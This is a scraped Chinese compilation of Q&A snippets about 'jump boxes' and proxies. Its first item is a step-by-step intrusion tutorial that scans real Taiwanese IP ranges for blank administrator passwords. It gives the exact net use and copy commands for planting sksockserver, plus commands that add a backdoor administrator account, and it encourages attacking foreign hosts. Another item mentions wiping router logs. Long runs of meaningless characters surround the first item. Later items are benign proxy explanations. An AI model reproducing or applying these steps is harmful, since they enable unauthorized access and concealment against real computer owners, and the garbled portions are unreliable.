1、怎樣製作代理跳板 詳細
莃薇蚆羆肂 荿螞羆芄蚅薈羅莇蒈褘羄 肆蚃螂羃腿蒆蚈羂芁蟻薄 肁莃蒄袃肀肅芇蝿肀膅蒃 螅聿莈芅蟻肈肇薁薇肇膀 莄褘肆節蕿螁肅莄莂蚇膄 肄薇薃膄嗉莀袂膃荿薆袈 膂蒁葿螄膁膀蚄蝕螈芃蕆 薆螇蒞螞裊螆肅蒅螁裊膇 蟻蚇襖艿蒃薃袃蒂芆羈袂 膁薂袇袂芄蒞螃袁莆薀蠆 袀肆莃薅衿膈薈襖羈芀莁 螿羇莃薇蚆羆肂荿螞羆芄 蚅薈羅莇蒈褘羄肆蚃螂羃 腿蒆蚈羂芁蟻薄肁莃蒄袃 肀肅芇蝿肀膅蒃螅聿莈芅 蟻肈肇薁薇肇膀莄褘肆節 蕿螁肅莄莂蚇膄肄薇薃膄 嗉莀袂膃荿薆袈膂蒁葿 螄膁膀蚄蝕螈芃蕆薆螇蒞 螞裊螆肅蒅螁裊膇蟻蚇襖 艿蒃薃袃蒂芆羈袂膁薂袇 袂芄蒞螃袁莆薀蠆袀肆莃 薅衿膈薈襖羈芀莁螿羇莃 薇蚆羆肂荿螞羆芄蚅薈羅 莇蒈褘羄肆蚃螂羃腿蒆蚈 羂芁蟻薄肁莃蒄袃肀肅芇 蝿肀膅蒃螅聿莈芅蟻肈肇 薁薇肇膀莄褘肆節蕿螁肅 莄莂蚇膄肄薇薃膄嗉莀袂 膃荿薆袈膂蒁葿螄膁膀蚄 蝕螈芃蕆薆螇蒞螞裊螆肅 蒅螁裊膇蟻蚇襖艿蒃薃袃 蒂芆羈袂膁薂袇袂芄蒞螃 袁莆薀蠆袀肆莃薅衿膈薈 襖羈芀莁螿羇莃薇蚆羆肂 荿螞羆芄蚅薈羅莇蒈褘羄 肆蚃螂羃腿蒆蚈羂芁蟻薄 肁莃蒄袃肀肅芇蝿肀膅蒃 螅聿莈芅蟻肈肇薁薇肇膀 莄褘肆節蕿螁肅莄莂蚇膄 肄薇薃膄嗉莀袂膃荿薆袈 膂蒁葿螄膁膀蚄蝕螈芃蕆 薆螇蒞螞裊螆肅蒅螁裊膇 蟻蚇襖艿蒃薃袃蒂芆羈袂 膁薂袇袂芄蒞 螃袁莆薀蠆 怎樣製作代理跳板 特別提醒:千萬不要做國內的主機啊!做日本或者阿扁(台灣)吧,這樣既不違反 我們國家的法律,也體現了自己的愛國心,哈哈(摘錄別人的話),不過最好還是老老實實的做跳板,不要總是去想著做什麼壞事。 千萬不要用國內的主機做試驗啊,否則等著警車來接你啦 怎樣製作代理跳板 說明:(1)這篇文章是我自己做跳板的一點體會,是些給那些從來沒有做過跳板的網友看的。做過跳板的網友就不用看了。 (2)本文講述的是做跳板最簡單,最基礎的方法,僅僅是給新手提供一個思路,一些稍微復雜的方法比如unicode,CGI 等等這里不講。 (3)做跳板畢竟算是一種入侵行為,有了跳板和肉雞以後,千萬要用在該用的地方,不要刻意去「黑「別人啊!! 准備工作: 做一件事情,至少需要兩個方面的准備工作:相關的基礎知識和做這件事情的工具。 基本的工具:(1)x-scan v1.3:強大的漏洞掃描工具,對於初學者來說非常好的一個工具。我們主要用他來掃描一些基本的漏洞(主要是NT 弱密碼),用法在後面會具體說。(其實流光很不錯的,但是我覺得流光再掃NT 弱密碼的時候太煩了) (2)superscan:非常快速的埠掃描工具,可以在很短的時間里發現某個 IP 域上 IP 的分布。為什麼用他呢?主要是避免盲目掃描,提高效率:某個 IP 域上IP 地址的分布不是連續的,也許他從xxx.xxx.0.0-xxx.xxx.50.255 上每個IP 都是有計算機存在的,而從 xxx.xxx.51.0- xxx.xxx.100.255 每個IP 都沒有計算機存在。如果你事先不知道這一段上根本沒有主機的話,花了很長時間去掃描也不會有結果,浪費時間和金錢 啊。 (3)fluxay 4.0:大名鼎鼎的掃描工具,我們主要用它的NT 管道命令功能來連接目標主機,以及添加用戶、遠程啟動服務等。注意了:最好是fluxay 4.0 版本。 (4)windows2000 下的c:\命令提示符工具:也就是說,跳板的製作至少是要在windows2000 以上的操作系統下進行。 (5)sksockserver.exe:做跳板的主角,就是用它來實現遠程主機的socks5 代理功能的。 (6)全球IP 地址分配表:這個對於高手來說是不必要的,用他的目的是考慮到很多以前沒有做過跳板的網友對IP 的分布不了解,我們主要的目標還是國外的主 機,因此對國外的IP 分布有一些了解是很重要的,也是以後我們選定所要掃描的 IP 域的主要根據。這樣的話,就省得再去用「追捕」軟體查找IP 的實際所在地 了。 好了工具准備完了,現在了解一下做跳板的大概過程。 注意:剛才你下載的這些東東不是放在你的硬碟上!放在什麼地方呢?放在「肉雞」上! 就是說我們做跳板的過程是在肉雞上完成的。 名詞解釋肉雞:肉雞是開了3389 埠微軟終端服務(microsoft terminal service),又有弱密碼的高速伺服器,俗稱「肉雞」。我們之所以要在肉雞上做,是出於安全考慮,因為做跳板畢竟是一種非法入侵行為,我們需要隱藏自 己的蹤跡,當然,不想用肉雞也可以,前提是你有足夠的帶寬,而且不怕公安上門找你麻煩。(當然,進入肉雞本身也是一種非法的入侵)。我們用 mstsc.exe 這個軟體登陸上肉雞,就可以像平時我們在自己電腦上一樣用滑鼠控制遠 程的伺服器(也就是肉雞)做我們要做的事情。 過程:為了敘述的方便,先假設我們已經有了一個肉雞。下面的步驟沒有特殊說明都是在「肉 雞」上完成的。 (1) 先在自己的機器上打開全球IP 地址分配表,選取一個IP 區域 (2) 登陸上肉雞,把剛才說到的工具在肉雞上下載好,就用肉雞自己的IE 下載就行了。 (3) 主要的過程是:先用superscan 掃描(1)選定的IP 區域,找到其中一個IP 很集中的區域,然後放到x-scan 進行漏洞掃描(因為是面對以前沒有 做過跳板的網友,所以這里只介紹用NT 弱密碼製作跳板),找到若干個有弱密碼的IP,把sksockserver.exe 上傳到目標主機上,然後遠程啟動 sksockserver。這樣,跳板就做好了。 我們一起來實踐一下,做一個跳板: (1) 剛才說過了,沒有肉雞做跳板是不行的,尤其是撥號上網的網友(速度慢)。我們首先登陸上一個已經知道的肉雞:xxx.xxx.xxx.xxx。幫剛才上面 提到的東東都准備好。最好是集中放置,這樣便於我們使用。不要到處亂放,否則主人一進來就知道有人進過他的機器。 (2) 我們選擇210.85.0.0-210.85.50.255 這一段IP(台灣),放在superscan裡面去,把superscan 的埠設置改成只有 80 一個埠,然後確定,開始掃描。這時,在下面的輸出框裡面,就會出現一大批的活躍 IP,看見了嗎?210.85.0.0-210.85.40.255 這一段上都是活躍的 IP。現在我們隨便選一個IP 區域,比如我們就選210.85.0.0-210.85.5.255 這一段,不要太長,因為下一步我們要 把他們放進x-scan 進行掃描,x-scan 掃描速度並不是很快,太多的話,會降低效率,而且IP 區域過長的話,有可能使x-scan 出現誤報。 x-scan 的使用方法這里就不詳細敘述了這里要做的就是:在「設置」菜單里,先選「掃描模塊」,選擇「開放埠」和「NT 弱密碼」兩個選項,在「掃描參 數」里,填上我們剛才選定的 IP 范圍:210.85.0.0-210.85.5.255,接著,在其中「埠相關設置」里,把原先一長串的埠去掉,只填 上80,3389 兩個埠,其他的設置就用默認的好了,不用再改了。然後就開始搜索,這需要大概你 8、9 分鍾的時間(因為 x-scan 雖然簡單,但是速度慢),這段時間你大可以做一點自己的其他事情,等時間差不多了,你再看看 x-scan 裡面的結果:好的,N 個機器的密碼為空,這下子有收獲了!但是要說的 是,x-scan 有一些誤報,大家一定要有耐心去試啊! (3) 我們隨便從中間隨便選了一個,比如:210.85.0.14:administrator 空。接下來的事情, 是要驗證它到底接不接受我們的連接,密碼是不是正確。現在用到流光了,打開流光,選擇「工具」裡面的「NT管道遠程命令」,出現對話框,把剛才的IP,用戶名,密碼填進去,然後回車。在界面上「NTCMD>」提示符後面打入CMD,連接成功,屏幕上出現了「C: \WINNT\ SYSTEM32>」的提示符。這證明,剛才的用戶名和密碼是正確的,這台機器已經基本是你的了。好了,我們進去了,想想我們要做什麼呢?對了,是做跳板,我們還要把sksockserver.exe 放到210.85.0.14 上,這樣才能啟動服務,讓這台機器做為跳板!怎麼把這個東東放上去呢: 調出肉雞上的CMD,在命令提示符下按下面的方法做: c:\net use \\210.85.0.14\ipc$ 「」/user:「administrator」(建立IPC 連接) 系統提示:命令成功完成。 Copy c:\sksockserver.exe \\210.85.0.14\admin$ 系統提示:成功復制一個文件。 這樣我們就成功地把 sksockserver.exe 傳到了目標主機上。接下來的任務就是把他遠程啟動就行了。 我們又回到剛才流光的NTCMD 里,在提示符下按下面的方法做: c:\sksockserver –install 系統提示:snake sockproxy service installed c:\sksockserver –config port 1949(埠自己來定,這里的1949 是隨便選的) 系統提示:the port value have set to 1949 c:\sksockserver –config starttype 2 系統提示:the starttype have set to 2---auto c:\net start skserver 系統提示服務啟動成功。 這個時候,這台機器已經成為你的跳板了。 下面簡單的說一說自己找肉雞的方法。 工具:(1)sockscap:強大的socks 代理調度軟體。 (2)snake 的代理跳板GUI(圖形界面程序) (3)mstsc:微軟terminal service 終端服務的客戶端程序。用於登陸3389 肉 雞。有了它,我們就可以象控制自己的機器一樣控制終端伺服器,做我們的事情了。 其實前面兩個都是附屬的工具,只有mstsc 才是真正唱主角的。 Sockscap 和sksockserver GUI 配合實現實現跳板的使用,可以隱藏我們的 入侵痕跡。 我們現在還沒有肉雞,那麼一切事情都只能在我們自己的機器上做了,如果你不放心的話 可以到網吧去做下面的事情。 但是,要提醒的是,千萬不要做國內的主機啊!做日本或者阿扁(台灣)吧,這樣既不違反 我們國家的法律,也體現了自己的愛國心,哈哈(摘錄別人的話),不過最好還是老老實實 的做跳板,不要總是去想著做什麼壞事。 步驟其實跟做跳板也很相似的。剛才我們在x-scan 搜索的埠里設置了3389,如果一台機 器開了3389 埠,而且有了弱密碼的話,那這樣的機器就是所謂的「肉雞」了。(當然輸入 法漏洞有的時候也可以做成肉雞,但是畢竟現在有輸入法漏洞的機器太少了,遠遠不及有弱 密碼的終端伺服器那麼多,所以我們還是選擇了後者,而且輸入法漏洞只適合國內機器。一 個一個去試驗,真是太浪費時間了!會煩死的。) 具體搜索過程跟剛才在作跳板里是一樣的,找到一個開了3389 埠服務,而且有弱密碼的 機器。我們在上面搜索的結果中仔細地看看,終於發現了一台:210.85.2.84:frank41:空。而 且開了3389 服務。要把這台機器變成自己地機器那肯定要有自己的登錄名,否則每次總是 用別人的,那還怎麼叫是自己的機器?我們現在來為自己添加一個用戶名,把自己提升成為 root 許可權,那麼我們就可以做任何事情了。打開流光,選擇「工具」裡面的「NT 管道命令」 填上剛才得到的用戶名跟密碼:frank41:空。然後確定,進入NTCMD 界面,在提示符下 鍵入:CMD,連接成功以後在系統提示符下如下操作: c:\net user admin /add(添加一個admin 用戶) c:\net user admin shonline788(使得admin 的密碼是shonline788) c:\net localgroup administrators admin /add(把用戶admin 提升為administrator 即管理員身份) 這樣我們就成功的在這台機器中取得了root 許可權,可以作任何事情了,但是別做壞事噢。 下一步,就要用上我們剛才准備的這些工具了。在網上搞幾個socks 代理,把sockscap 和 sksockserverGUI 設置好,把mstsc 的圖標拖到sockscap 里去,雙擊mstsc 的圖標,在其中填 上你剛才找到的肉雞IP:210.85.2.84,然後回車進行連接。成功以後,會出現一個跟我們平 時登陸windows2000 時候一樣的一個藍色的界面,在裡面填上我們剛才添加的用戶名和密 碼,回車登陸。登陸成功以後就會出現該主機的圖形界面,這個時候你就可以象操作自己的 機器一樣,操作別人的機器。至此,你已經獲得了一台肉雞。就可以做我們上面做過的事情 了。 節蒈螅羈莂薁羈 芆莁蚃螄膂莀螅罿肈荿薅 螂肄莈蚇肈羀莇蝿袀艿莇 葿肆膅莆薁衿肁蒅蚄肄羇 蒄螆袇芆蒃蒆蝕節蒂蚈裊 膈蒁螿螈肄蒁蒀羄羀蒀薂 螆羋葿蚅羂膄薈螇螅肀薇 蕆羀羆薆蕿螃蒞薅螁羈芁 薅袃袁膇薄薃肇肅膀蚅衿 罿腿螈肅芇膈蕆袈膃羋薀 肅聿芇螞褘羅芆襖蠆莄芅 薄羄芀芄蚆螇嗉芃蝿羃肂 節蒈螅羈莂薁羈芆莁蚃螄 膂莀螅罿肈荿薅螂肄莈蚇 肈羀莇蝿袀艿莇葿肆膅莆 薁衿肁蒅蚄肄羇蒄螆袇芆 蒃蒆蝕節蒂蚈裊膈蒁螿螈 肄蒁蒀羄羀蒀薂螆羋葿蚅 羂膄薈螇螅肀薇蕆羀羆薆 蕿螃蒞薅螁羈芁薅袃袁膇 薄薃肇肅膀蚅衿罿腿螈肅 芇膈蕆袈膃羋薀肅聿芇螞 褘羅芆襖蠆莄芅薄羄芀芄 蚆螇嗉芃蝿羃肂節蒈螅羈 莂薁羈芆莁蚃螄膂莀螅罿 肈荿薅螂肄莈蚇肈羀莇蝿 袀艿莇葿肆膅莆薁衿肁蒅 蚄肄羇蒄螆袇芆蒃蒆蝕節 蒂蚈裊膈蒁螿螈肄蒁蒀羄 羀蒀薂螆羋葿蚅羂膄薈螇 螅肀薇蕆羀羆薆蕿螃蒞薅 螁羈芁薅袃袁膇薄薃肇 肅膀蚅衿罿腿螈肅芇膈蕆 袈膃羋薀肅聿芇螞褘羅芆 襖蠆莄芅薄羄芀芄蚆螇嗉 芃蝿羃肂節蒈螅羈莂薁羈 芆莁蚃螄膂莀螅罿肈荿薅 螂肄莈蚇肈羀莇蝿袀艿莇 葿肆膅莆薁衿肁蒅蚄肄羇 蒄螆袇芆蒃蒆蝕節蒂蚈裊 膈蒁螿螈肄蒁蒀羄羀蒀薂螆羋葿 蚅羂膄薈螇螅肀薇蕆羀羆 薆蕿螃蒞薅螁羈芁薅袃袁 膇薄薃肇肅膀蚅衿罿腿螈 肅芇膈蕆袈膃羋薀肅聿芇 螞褘羅芆襖蠆
2、如何架構一台二級跳板服務端,求大神指導或者直接僱傭
一個人在機器輔助作用,使用該主機作為一個間接的手段侵入其他主機,一般和肉雞配合。點擊看詳細IP跳板攻擊是經常使用別人的機器做中轉站來攻擊你的機器,最實用的方法是基於一個一個地尋找攻擊的IP地址,攻擊者加入路由器跳板或交換機(如Cisco的產品),雖然路由器的日誌文件會記錄登陸IP,但是你可以通過相關的命令清除日誌。這些日誌將永遠刪除,因為存儲在快閃記憶體中的路由器日誌,一旦刪除將無法恢復。如果跳板全部用主機,雖然也可以清除日誌,但現在恢復軟體可以恢復這些日誌往往會留下痕跡,網路安全人員可以利用這些線索可能會發現自己。之後,電腦已經跳板攻擊,如何捕捉到真正的攻擊IP
中國
什麼是「抓雞」,點擊看詳細
首先你要了解什麼是「雞」
中國計算機稱為肉雞,就是擁有一台遠程計算機的管理許可權。這是由一個遠程計算機控制的其他人。雞可以是各種系統,如取勝,Linux和UNIX等;更能公司\企業\學校甚至政府強制伺服器,一般說的肉雞是3389開放埠的Win2K伺服器系統,因此3389是沒有必要開時關上最好的。
中國肉雞一般黑客0.08,0.1元到每月費用30元。
中國必須登錄的雞,你必須知道三個參數:遠程電腦的IP,用戶名和密碼。
中國說起雞,有必要談到了遙控器。遠程式控制制軟體,如灰鴿子,上興,鳳凰ABC等。
中國不是吃的那種肉雞,是一個木馬,或者留了後門,可以遠程式控制制的機器,現在很多人都有權利WEBSHELL機器也叫肉雞。
中國誰不希望自己的電腦被別人控制,但很多人的電腦是幾乎不設防的,很容易被遠程攻擊者完全控制。您的計算機將成為砧板別人的肉,別人想怎麼吃,怎麼吃,雞(機)所得到的。口下
中國通常與計算機網路連接是有弱口令,這樣就給黑客可以利用該機器的優勢,通過使用合適的工具來破解掃描工具,讓你成為一個黑客入侵的「肉雞」
中國這樣的手中,他們會打電話「抓雞」
3、電腦上怎麼使用跳板與代理IP?
跳板 ,通過不同軟體來進行的。每一種的使用方法也有所不同。
現在假設你是A,要掃的是B ,那麼,通常建立3次握手的過程是: A---Syn--->B A<---Syn/Ack---B A---Ack--->B 給一個 跳板設置代理伺服器動畫的連接:http://hack.77169.com/HTML/20060821091000.html
4、如何直接通過跳板機ssh到伺服器
公司連遠程游戲服需要先ssh登跳板機再跳板機ssh遠程能直連:
自系統(Mac OS) ===> 跳板機 ===>遠程伺服器
1. 跳板機遠程伺服器Linux遠程伺服器python 2.5(太舊)
都ssh、scp遠程伺服器能用ssh、scp連跳板機跳板機能用sshscp連自
系統說能向能反向
2. 自系統perl 5.1、python 2.7.5、ssh、scp等各種UNIX必備
3. 跳板機能用命令能訪問目錄自home目錄
4. 遠程伺服器運維監控著能亂搞亂監聽埠服務
5、跳板的代理
一般是黑客或紅客用的,一般的用戶很少機會用得上.跳板這個概念用在代理服務上面偶是在接接觸snake的那個代理程序見到的。「代理跳板」一般都是指snake開發的那個sock5代理服務程序。代理跳板好像就是支持connect命令的http代理伺服器因為常常被當成黑軟使用
HTTP代理小常識
一、HTTP代理的匿名性
This is a proxy that hides the original users' IP address and other details from the remote server. 這種代理,對遠端伺服器隱藏原始用戶的IP地址以及其它細節(可能,但不必需)。
HTTP代理匿名性是指不通過非常技術手段,直接使用時代理的匿名安全性。(說明:這里的匿名與其它如FTP伺服器的匿名意義是不一樣的,不論匿名與否,代理伺服器均能起到「代理」的作用。只是匿名代理可以確保被訪問方不能追溯到源IP,在一定程度上更加安全而已。這並不是一個重要的指標,是否必要則仁者見仁、智者見智。)
測試自己的http代理是否匿名,簡單方法:xxx網站,先看「REMOTE_ADDR」顯示的ip,如果不是你本身的ip,說明代理伺服器起作用了。再看「HTTP_X_FORWARDED_FOR」,如果有,並顯示你的ip,為非匿名代理。如果沒有顯示,則為匿名代理。(Tips:看一下「HTTP_USER_AGENT」和「HTTP_ACCEPT_LANGUAGE」,你就能知道你的代理提供了多大的安全性。) 二、HTTP CONNECT代理
對於HTTP代理,不少人有認識上的誤區,有必要說明一下,不是所有的HTTP代理都只能代理HTTP的,vice versa!
HTTP CONNECT代理伺服器是一種能夠允許用戶建立TCP連接到任何埠的代理伺服器,這意味著這種代理不僅可用於HTTP,還包括FTP、IRC、RM流服務等,甚至掃描、攻擊。 三、三種代理的區別
· 全匿名代理 不改變你的request fields,使伺服器端看來就像有個真正的客戶瀏覽器在訪問它。當然,你的真實IP是隱藏起來的。伺服器的網管不會認為你使用了代理。
· 普通匿名代理 能隱藏你的真實IP,但會更改你的request fields,有可能會被認為使用了代理,但僅僅是可能,一般說來是沒問題的。不過不要受它的名字的誤導,其安全性可能比全匿名代理更高,有的代理會剝離你的部分信息(就好比防火牆的stealth mode),使伺服器端探測不到你的*作系統版本和瀏覽器版本。
· 透明代理(簡單代理) 改編你的request fields,並會傳送真實IP。
跳板是一個程序,也可以說是一種socks5代理的應用吧。
* 從本地機器連接到遠程機器, 中間通過安裝的代理跳板。對應用程序而言,相當於普通的sock代理調用。
* 在跳板之間傳輸的數據,是已經被動態加密的。加密種子每次不同。
* 跳板的數目由1到255,不限制,當數目為0時,相當於Sock5代理伺服器
6、跳板和代理ip有什麼區別
跳板和代理IP
實際上是一個意思
跳板就是多重代理。走一個代理
之後
在這個代理之上
再走其他代理。這樣別人就很難追查到你的
真實IP
7、我有一個擁有公網IP的雲伺服器,如何使用他做跳板讓外網訪問到校園網內我的電腦
大概思路·撥VPN上去·然後再做埠映射!
8、「網路中的跳板是什麼意思
黑客想攻擊內網中的servers
第一次走的是紅色虛線,但是到了防火牆那裡被攔截啦,沒有成功。
第二次走的是藍色實線,通過控制內網一台員工的電腦,來攻擊servers。這時防火牆認為是合法的。攻擊就成功啦。
這時員工的那台電腦就成了 所謂的「跳板」。
圖畫的不好,能看懂就行。
希望能夠幫助到你,別忘了採納吆~
9、什麼是跳板軟體啊
一般是黑客或紅客用的,一般的用戶很少機會用得上.跳板這個概念用在代理服務上面偶是在接觸snake的那個代理程序見到的。「代理跳板」一般都是指snake開發的那個sock5代理服務程序。代理跳板好像就是支持connect命令的http代理伺服器因為常常被當成黑軟使用
HTTP代理小常識
一、HTTP代理的匿名性
This is a proxy that hides the original users' IP address and other deta
ils from the remote server. 這種代理,對遠端伺服器隱藏原始用戶的IP地址以及其
它細節(可能,但不必需)。
HTTP代理匿名性是指不通過非常技術手段,直接使用時代理的匿名安全性。(說明
:這里的匿名與其它如FTP伺服器的匿名意義是不一樣的,不論匿名與否,代理伺服器均
能起到「代理」的作用。只是匿名代理可以確保被訪問方不能追溯到源IP,在一定程度
上更加安全而已。這並不是一個重要的指標,是否必要則仁者見仁、智者見智。)
測試自己的http代理是否匿名,簡單方法:xxx網站
,先看「REMOTE_ADDR」顯示的ip,如果不是你本身的ip,說明代理伺服器起作用了。再
看「HTTP_X_FORWARDED_FOR」,如果有,並顯示你的ip,為非匿名代理。如果沒有顯示
,則為匿名代理。(Tips:看一下「HTTP_USER_AGENT」和「HTTP_ACCEPT_LANGUAGE」,
你就能知道你的代理提供了多大的安全性。)
二、HTTP CONNECT代理
對於HTTP代理,不少人有認識上的誤區,有必要說明一下,不是所有的HTTP代理都
只能代理HTTP的,vice versa!
HTTP CONNECT代理伺服器是一種能夠允許用戶建立TCP連接到任何埠的代理伺服器
,這意味著這種代理不僅可用於HTTP,還包括FTP、IRC、RM流服務等,甚至掃描、攻擊
。
三、三種代理的區別
· 全匿名代理 不改變你的request fields,使伺服器端看來就像有個真正的客戶
瀏覽器在訪問它。當然,你的真實IP是隱藏起來的。伺服器的網管不會認為你使用了代
理。
· 普通匿名代理 能隱藏你的真實IP,但會更改你的request fields,有可能會被
認為使用了代理,但僅僅是可能,一般說來是沒問題的。不過不要受它的名字的誤導,
其安全性可能比全匿名代理更高,有的代理會剝離你的部分信息(就好比防火牆的stea
lth mode),使伺服器端探測不到你的*作系統版本和瀏覽器版本。
· 透明代理(簡單代理) 改編你的request fields,並會傳送真實IP。
跳板是一個程序,也可以說是一種socks5代理的應用吧。
* 從本地機器連接到遠程機器, 中間通過安裝的代理跳板。對應用程序而言,相當於普
通的sock代理調用。
* 在跳板之間傳輸的數據,是已經被動態加密的。加密種子每次不同。
* 跳板的數目由 1 到 255,不限制,當數目為0時,相當於Sock5代理伺服器
10、伺服器跳板轉發功能設置
請求A的內容